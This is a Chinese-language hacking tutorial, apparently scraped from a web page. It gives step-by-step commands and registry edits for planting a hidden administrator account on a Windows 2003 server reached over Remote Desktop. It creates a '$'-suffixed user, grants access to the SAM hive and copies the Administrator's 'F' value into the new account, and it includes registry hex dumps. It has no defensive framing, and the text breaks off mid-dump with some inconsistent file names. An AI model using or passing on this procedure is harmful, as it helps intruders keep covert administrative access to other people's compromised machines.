class="area"> Windows 2003开启隐藏账号 
当登陆进3389以后-- 
先建立 cnlnfjhh$ 用户 
c:\>net user cnlnfjhh$ wrsky /add 
//后面加$ 是为了使在 控制台下用 net user 看不到. 
然后运行regedt32.exe(注意不是regedit.exe) 
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组, 
把"权限"->"完全控制"->"允许"打上勾,然后确定. 
这样就可以直接读取本地sam的信息 
现在运行regedit.exe 
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 
查看默认键值为"0x3f1" 相应导出如下 
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为cnlnfjhh$.reg 
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg 
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键) 
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下 
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\ 
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\ 
00,00,00,00,00,00,00 
把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴. 
打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制 
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$] 
@=hex(3f1): 
回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下 
Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1] 
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\ 
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\ 
00,00,00,00,00,00,00 
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\ 
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\ 
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\ 
01,00,00,00,00,00,00,00,00,00,00,14,01,0